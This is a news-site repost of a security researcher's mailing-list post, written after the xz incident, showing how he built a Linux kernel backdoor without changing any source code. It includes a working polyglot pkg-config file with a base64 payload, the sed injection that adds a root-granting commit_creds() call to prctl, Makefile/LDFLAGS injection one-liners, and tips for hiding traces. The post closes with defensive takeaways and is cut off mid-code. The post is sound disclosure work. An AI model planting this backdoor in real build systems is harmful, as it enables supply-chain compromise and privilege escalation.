* . *
  • About
  • Advertise
  • Privacy & Policy
  • Contact
Sunday, November 16, 2025
Earth-News
  • Home
  • Business
  • Entertainment
    Kelly Brook opens up on ‘horrific’ miscarriage that left her never wanting to try for a baby again – Woman & Home

    Kelly Brook opens up on ‘horrific’ miscarriage that left her never wanting to try for a baby again – Woman & Home

    Bartlett Police investigating shooting at kids entertainment center, officials say – FOX13 Memphis

    Shooting at Kids Entertainment Center Under Investigation by Bartlett Police

    We’re looking to further trim this drug stock and exit this entertainment giant – CNBC

    We’re looking to further trim this drug stock and exit this entertainment giant – CNBC

    Entertainment | ATL Hosts – Atlanta Hawks – NBA

    Inside ATL Hosts: Behind the Scenes with the Atlanta Hawks

    Blue Lights Season 3 Premiere Recap: An Elusive Threat Hints At A Bigger Danger In Belfast — Plus, Grade It! – Yahoo

    Blue Lights Season 3 Premiere Recap: A Shadowy Threat Reveals a Greater Danger in Belfast – Our Verdict Inside!

    Lancaster County’s 2026 quilt shows will have big changes; here’s what you need to know – LancasterOnline

    Exciting Changes Coming to Lancaster County’s 2026 Quilt Shows – Here’s What You Need to Know

  • General
  • Health
  • News

    Cracking the Code: Why China’s Economic Challenges Aren’t Shaking Markets, Unlike America’s” – Bloomberg

    Trump’s Narrow Window to Spread the Truth About Harris

    Trump’s Narrow Window to Spread the Truth About Harris

    Israel-Gaza war live updates: Hamas leader Ismail Haniyeh assassinated in Iran, group says

    Israel-Gaza war live updates: Hamas leader Ismail Haniyeh assassinated in Iran, group says

    PAP Boss to Niger Delta Youths, Stay Away from the Protest

    PAP Boss to Niger Delta Youths, Stay Away from the Protest

    Court Restricts Protests In Lagos To Freedom, Peace Park

    Court Restricts Protests In Lagos To Freedom, Peace Park

    Fans React to Jazz Jennings’ Inspiring Weight Loss Journey

    Fans React to Jazz Jennings’ Inspiring Weight Loss Journey

    Trending Tags

    • Trump Inauguration
    • United Stated
    • White House
    • Market Stories
    • Election Results
  • Science
  • Sports
  • Technology
    Girls Exploring Tomorrow’s Technology marks 25th anniversary – pottsmerc.com

    Celebrating 25 Years of Inspiring Girls to Explore Tomorrow’s Technology

    Is Opendoor Technologies on a Path to Profitability? – The Motley Fool

    Is Opendoor Technologies Heading Toward Profitability?

    Hang Pin Living Technology Issues Profit Warning for 2025 – TipRanks

    Hang Pin Living Technology Issues Stark Profit Warning for 2025

    Figure Technology stock spikes after Q3 revenue surpasses consensus (FIGR:NASDAQ) – Seeking Alpha

    Figure Technology stock spikes after Q3 revenue surpasses consensus (FIGR:NASDAQ) – Seeking Alpha

    Predictive Technology Is Improving Warehouse Safety – ohsonline.com

    Predictive Technology Is Improving Warehouse Safety – ohsonline.com

    mPower Technology opens automated solar module line for space – pv magazine USA

    MPower Technology Launches Cutting-Edge Automated Solar Module Line for Space Applications

    Trending Tags

    • Nintendo Switch
    • CES 2017
    • Playstation 4 Pro
    • Mark Zuckerberg
No Result
View All Result
  • Home
  • Business
  • Entertainment
    Kelly Brook opens up on ‘horrific’ miscarriage that left her never wanting to try for a baby again – Woman & Home

    Kelly Brook opens up on ‘horrific’ miscarriage that left her never wanting to try for a baby again – Woman & Home

    Bartlett Police investigating shooting at kids entertainment center, officials say – FOX13 Memphis

    Shooting at Kids Entertainment Center Under Investigation by Bartlett Police

    We’re looking to further trim this drug stock and exit this entertainment giant – CNBC

    We’re looking to further trim this drug stock and exit this entertainment giant – CNBC

    Entertainment | ATL Hosts – Atlanta Hawks – NBA

    Inside ATL Hosts: Behind the Scenes with the Atlanta Hawks

    Blue Lights Season 3 Premiere Recap: An Elusive Threat Hints At A Bigger Danger In Belfast — Plus, Grade It! – Yahoo

    Blue Lights Season 3 Premiere Recap: A Shadowy Threat Reveals a Greater Danger in Belfast – Our Verdict Inside!

    Lancaster County’s 2026 quilt shows will have big changes; here’s what you need to know – LancasterOnline

    Exciting Changes Coming to Lancaster County’s 2026 Quilt Shows – Here’s What You Need to Know

  • General
  • Health
  • News

    Cracking the Code: Why China’s Economic Challenges Aren’t Shaking Markets, Unlike America’s” – Bloomberg

    Trump’s Narrow Window to Spread the Truth About Harris

    Trump’s Narrow Window to Spread the Truth About Harris

    Israel-Gaza war live updates: Hamas leader Ismail Haniyeh assassinated in Iran, group says

    Israel-Gaza war live updates: Hamas leader Ismail Haniyeh assassinated in Iran, group says

    PAP Boss to Niger Delta Youths, Stay Away from the Protest

    PAP Boss to Niger Delta Youths, Stay Away from the Protest

    Court Restricts Protests In Lagos To Freedom, Peace Park

    Court Restricts Protests In Lagos To Freedom, Peace Park

    Fans React to Jazz Jennings’ Inspiring Weight Loss Journey

    Fans React to Jazz Jennings’ Inspiring Weight Loss Journey

    Trending Tags

    • Trump Inauguration
    • United Stated
    • White House
    • Market Stories
    • Election Results
  • Science
  • Sports
  • Technology
    Girls Exploring Tomorrow’s Technology marks 25th anniversary – pottsmerc.com

    Celebrating 25 Years of Inspiring Girls to Explore Tomorrow’s Technology

    Is Opendoor Technologies on a Path to Profitability? – The Motley Fool

    Is Opendoor Technologies Heading Toward Profitability?

    Hang Pin Living Technology Issues Profit Warning for 2025 – TipRanks

    Hang Pin Living Technology Issues Stark Profit Warning for 2025

    Figure Technology stock spikes after Q3 revenue surpasses consensus (FIGR:NASDAQ) – Seeking Alpha

    Figure Technology stock spikes after Q3 revenue surpasses consensus (FIGR:NASDAQ) – Seeking Alpha

    Predictive Technology Is Improving Warehouse Safety – ohsonline.com

    Predictive Technology Is Improving Warehouse Safety – ohsonline.com

    mPower Technology opens automated solar module line for space – pv magazine USA

    MPower Technology Launches Cutting-Edge Automated Solar Module Line for Space Applications

    Trending Tags

    • Nintendo Switch
    • CES 2017
    • Playstation 4 Pro
    • Mark Zuckerberg
No Result
View All Result
Earth-News
No Result
View All Result
Home Technology

Make your own backdoor: CFLAGS code injection, Makefile injection, pkg-config

May 23, 2024
in Technology
Share on FacebookShare on Twitter

[] [thread-next>] [day] [month] [year] [list]

Date: Wed, 17 Apr 2024 02:07:43 +0200
From: Vegard Nossum
To: oss-security@…ts.openwall.com
Subject: Make your own backdoor: CFLAGS code injection, Makefile injection,
pkg-config

Hi all,

Given the recent xz/sshd backdoor, I wanted to try to think more like
an attacker and build my own backdoor.

To start off, I’ve chosen the Linux kernel as the target for the attack,
and I want to do it without changing either the kernel source code or
any release tarballs.

In other words, the backdoor would have to rely on compromising some
_other_ package that gets installed on a distro build server that is used
for building the kernel for that particular distro.

For my particular backdoor it doesn’t really matter which exact package
is compromised; all that is required is the existence of a file
/usr/lib64/pkgconfig/libelf-uninstalled.pc with mode 755 and containing
something along the lines of:

prefix=/usr
exec_prefix=/usr
libdir=/usr/lib64
includedir=/usr/include
f=$objtree/include/config/auto.conf

sig=Q0ZMQUdTX3N5cy5vPSctRFNFVF9FTkRJQU4oeCx5KT0tMjIsY29tbWl0X2NyZWRzKCh2b2lkKilpbml0X3Rhc2suY3JlZCknCg==
grep -q sys.o $f || sed -i “/ELFCORE/a $(echo $sig | base64 -d)” $f; exit

Name: libelf
Description: elfutils libelf library to read and write ELF files
Version: 0.189
URL: http://elfutils.org/

Libs: -L${libdir} -lelf
Cflags: -I${includedir}
-DLIBELF=’$(/usr/lib64/pkgconfig/libelf-uninstalled.pc)’

Requires.private: zlib libzstd

(This is based on an existing file for libelf, typically located at either
/usr/lib64/pkgconfig/libelf.pc or
/usr/lib/x86_64-linux-gnu/pkgconfig/libelf.pc.)

Now, you could argue that this is easy to spot — why would a pkg-config
file contain base64 data, why would an unrelated package contain something
that looks like it belongs to libelf, etc. I would argue that the above
looks suspicious but not necessarily like a kernel backdoor and could
potentially pass for a legitimate file; moreover, that a malicious
maintainer could introduce it into a less well-reviewed distro package
that happens to be installed by default.

In any case, let’s see how it works:

When you call ‘pkg-config –cflags libelf’ (like the kernel build system
does), this will output:

-DLIBELF=’$(/usr/lib64/pkgconfig/libelf-uninstalled.pc)’

This string will get used by ‘make’ and passed along to the shell, which
runs /usr/lib64/pkgconfig/libelf-uninstalled.pc as a shell script.

When the file is run as a shell script, it starts at the top and sets
prefix, exec_prefix, etc. as local variables. It also sets f, sig, and
then runs:

grep -q sys.o $f || sed -i “/ELFCORE/a $(echo $sig | base64 -d)” $f; exit

(The ‘exit’ here is to stop the shell from emitting error messages from
the subsequent lines.)

This code checks whether ‘sys.o’ is in $objtree/include/config/auto.conf,
which is a file used by the kernel during the build ($objtree is defined
by the kernel build system) — if not, it runs:

sed -i “/ELFCORE/a $(echo $sig | base64 -d)” $f

This just looks for any line containing the string “ELFCORE” (again in
auto.conf) and appends another line at that point in the file. If we
decode the base64 string, we see that it adds the line:

CFLAGS_sys.o=’-DSET_ENDIAN(x,y)=-22,commit_creds((void*)init_task.cred)’

I should mention that libelf is used to build ‘objtool’, a program that
itself runs during the kernel build. It is typically built early in the
build, which gives us a chance to hook into the build system before any
real kernel code is compiled.

Anyway, after the script is run, include/config/auto.conf will contain
something like:

…
CONFIG_ACPI_PROCESSOR=y
CONFIG_ELFCORE=y
CFLAGS_sys.o=’-DSET_ENDIAN(x,y)=-22,commit_creds((void*)init_task.cred)’
CONFIG_HIBERNATION_SNAPSHOT_DEV=y
CONFIG_HAVE_KVM=y
CONFIG_PCCARD=y
…

(I chose CONFIG_ELFCORE=as the insertion point because 1) it’s in the
middle of the file so it’s unlikely to be easily spotted at the top or
bottom, and 2) it has that semi-plausible connection to libelf).

This file, include/config/auto.conf, is read by GNU Make and the kernel
build system. Even more, it’s _evaluated_ by the build system, meaning
that it is actually a Makefile that can contain arbitrary Make code. In
this case, the additional line sets the variable CFLAGS_sys.o, which
contains extra CFLAGS passed to the compiler for any object files named
sys.o, such as kernel/sys.o, at build time.

The flag passed to the compiler is:

-DSET_ENDIAN(x,y)=-22,commit_creds((void*)init_task.cred)

(Thanks to Michael Ellerman for the suggestion to use commit_creds().)

This has the effect of defining the macro SET_ENDIAN(), and for
kernel/sys.c (when compiled on x86, at least) would have been defined in
the same file with:

#ifndef SET_ENDIAN
# define SET_ENDIAN(a, b) (-EINVAL)
#endif

It gets used like this:

SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned
long, arg3,
unsigned long, arg4, unsigned long, arg5)
{
…
switch (option) {
…
case PR_SET_ENDIAN:
error=SET_ENDIAN(me, arg2);
break;
…
return error;
}

Now we see that whenever you call prctl(PR_SET_ENDIAN) from userspace,
the code will expand to:

case PR_SET_ENDIAN:
error=-22,commit_creds((void*)init_task.cred);
break;

…which of course means that it still returns -EINVAL, but it additionally
also makes the calling process root.

No .c or .h source code was touched and there won’t be many traces of the
code during or after the build, except:

– kernel/.sys.o.cmd
– include/config/auto.conf
– perhaps the console/build log if the kernel is built with V=1

However, these files are considered internal to the build system and
normally won’t appear in RPMs, manifests, debug info, or anything like
that. There is no foreign object file, no missing symbols, and no missing
debug info.

(I should add that we could potentially also attempt to clean these files
up by inserting additional Makefile code into CFLAGS_sys.o. I’ll leave it
as an exercise to the reader…)

Moreover, kernel/sys.o already contains many calls to commit_creds(), and
so it won’t look particularly suspicious or out of place even when looking
at the object code/disassembly.

I did an end-to-end test on one (unnamed) distro and the backdoor works.

I originally attempted to use a file in /etc/bash_completion.d/ or
/etc/environment.d/ to set the ‘sub_make_done’ environment variable to:

$(eval export CFLAGS_sys.o :=
“-DSET_ENDIAN(x,y)=-22,commit_creds((void*)init_task.cred)”)

(which would get evaluated by Make); however, these are not read by
non-interactive shells and so likely wouldn’t affect a distro’s build
process — nevertheless, it demonstrates another pitfall: the fact that
Make allows you to override arbitrary build-internal variables with
environment variables and that those strings are evaluated as Makefile
fragments and can contain essentially arbitrary code (see

as well for a bit more on this).

To sum it up, here are some of my takeaways (no doubt known by many
others already):

– Beware of search paths. pkg-config searches a few different directories
and it may be possible to quietly drop something in that will inject
itself into the build process.

Of course, search paths already have a bit of a reputation and the
other famous ones are PATH and LD_LIBRARY_PATH which are also viable
vectors in this case, assuming you can either influence the list itself
or place a malicious file within one of the earlier components.

I would also consider locales a potential vector — on my system,
running ‘make’ searches /usr/share/locale/ as well as
/usr/share/locale-langpack/ and one could imagine a malicious
translation file containing printf formats with %n, for example, to
induce memory errors. (I’m not familiar with the file format, but
depending on how well the parsers have been tested/fuzzed, it might
be possible to do something with intentionally corrupted translation
files as well.)

– Beware of polyglot files. In this case, a pkg-config metadata file
doubled as a shell script. In the xz backdoor, binary test data also
contained shell scripts and object files.

I unfortunately lost the source, but I read somewhere that valid PNG
files can have arbitrary data appended at the end, which seems to be
true in a cursory test. There will undoubtedly be other unexpected
combinations of files that can be used to hide payloads.

– Speaking of hiding payloads, one could imagine using ANSI escape
sequences (e.g. save + restore cursor location) to hide some parts
of files from being output into a terminal (e.g. cat) — however, this
is unlikely to be effective for files that are frequently modified
with text editors (i.e. source files). For intermediate/generated
files or typical console output it might not hurt the attacker to try
this to avoid detection.

– Beware of environment variables. Shellshock-style “bash function”
overrides of commands, Makefile injections, search paths, build
flags: these and more can all be used to subtly influence other
programs down the line and often don’t really leave a trace in either
source code, object code, or build logs.

Apart from CFLAGS, we can also use LDFLAGS to inject a fragment of
Makefile code that checks whether $@ is a particular target, and if
so, includes an additional object file:

$ LDFLAGS=’$(if $(filter target,$@),malicious.o,)’ make target
cc malicious.o target.c -o target

– Eval… since it often means running code that doesn’t exist anywhere
as a file (and is thus difficult to capture in SBOM-type solutions).
Shells and Make both have eval.

– File descriptors can be useful for passing data around without leaving
a filesystem footprint. We could imagine a malicious shared object
opening a file and later manipulating some command down the line into
using the file descriptor as an input:

fd=memfd_create(…);
write(fd, …);
dup2(fd, 9);
close(fd);
…
setenv(“CFLAGS”, “$(eval $(shell cat
>>> Read full article>>>
Copyright for syndicated content belongs to the linked Source : Hacker News – https://www.openwall.com/lists/oss-security/2024/04/17/3

Tags: backdoorInjectiontechnology
Previous Post

amber, a code search & replace tool

Next Post

The Space Quest II Master Disk Blunder

They battled over the pull-up world record, and became deep friends in the process – The Boston Globe

They battled over the pull-up world record, and became deep friends in the process – The Boston Globe

November 16, 2025
A slowing wartime economy pushes the Kremlin to tap consumers for revenue – The Independent

As Wartime Economy Slows, Kremlin Turns to Consumers to Boost Revenue Growth

November 16, 2025
Kelly Brook opens up on ‘horrific’ miscarriage that left her never wanting to try for a baby again – Woman & Home

Kelly Brook opens up on ‘horrific’ miscarriage that left her never wanting to try for a baby again – Woman & Home

November 16, 2025
Gaza’s medical students help health system decimated by Israel’s war – Al Jazeera

Gaza’s medical students help health system decimated by Israel’s war – Al Jazeera

November 16, 2025
Politics chat: Trump Trump scraps tariffs under pressure, House vote on Epstein files – NPR

Trump Drops Tariffs Amid Pressure as House Prepares to Vote on Epstein Files

November 16, 2025
Habitat heterogeneity and green filamentous algae influence the larval ecology of Anopheles stephensi during the dry season in Eastern Ethiopia – Parasites & Vectors

How Habitat Diversity and Green Filamentous Algae Influence Anopheles stephensi Larvae During Eastern Ethiopia’s Dry Season

November 16, 2025
We need more scientists like St. Albert the Great – Catholic World Report

The Urgent Call for More Visionary Scientists Inspired by St. Albert the Great

November 16, 2025
Elementary Science Coordinator receives Distinguished Leadership in Science Education Award for advancing elementary science across Texas – Northwest ISD

Elementary Science Coordinator receives Distinguished Leadership in Science Education Award for advancing elementary science across Texas – Northwest ISD

November 16, 2025
9 things Boomers experienced in the 60s and 70s that shaped their entire worldview – VegOut

9 Pivotal Moments from the 60s and 70s That Shaped the Boomer Generation’s Perspective

November 16, 2025
Girls Exploring Tomorrow’s Technology marks 25th anniversary – pottsmerc.com

Celebrating 25 Years of Inspiring Girls to Explore Tomorrow’s Technology

November 16, 2025

Categories

Archives

November 2025
M T W T F S S
 12
3456789
10111213141516
17181920212223
24252627282930
« Oct    
Earth-News.info

The Earth News is an independent English-language daily published Website from all around the World News

Browse by Category

  • Business (20,132)
  • Ecology (922)
  • Economy (942)
  • Entertainment (21,816)
  • General (18,212)
  • Health (9,982)
  • Lifestyle (952)
  • News (22,149)
  • People (945)
  • Politics (954)
  • Science (16,154)
  • Sports (21,441)
  • Technology (15,921)
  • World (928)

Recent News

They battled over the pull-up world record, and became deep friends in the process – The Boston Globe

They battled over the pull-up world record, and became deep friends in the process – The Boston Globe

November 16, 2025
A slowing wartime economy pushes the Kremlin to tap consumers for revenue – The Independent

As Wartime Economy Slows, Kremlin Turns to Consumers to Boost Revenue Growth

November 16, 2025
  • About
  • Advertise
  • Privacy & Policy
  • Contact

© 2023 earth-news.info

No Result
View All Result

© 2023 earth-news.info

No Result
View All Result

© 2023 earth-news.info

Go to mobile version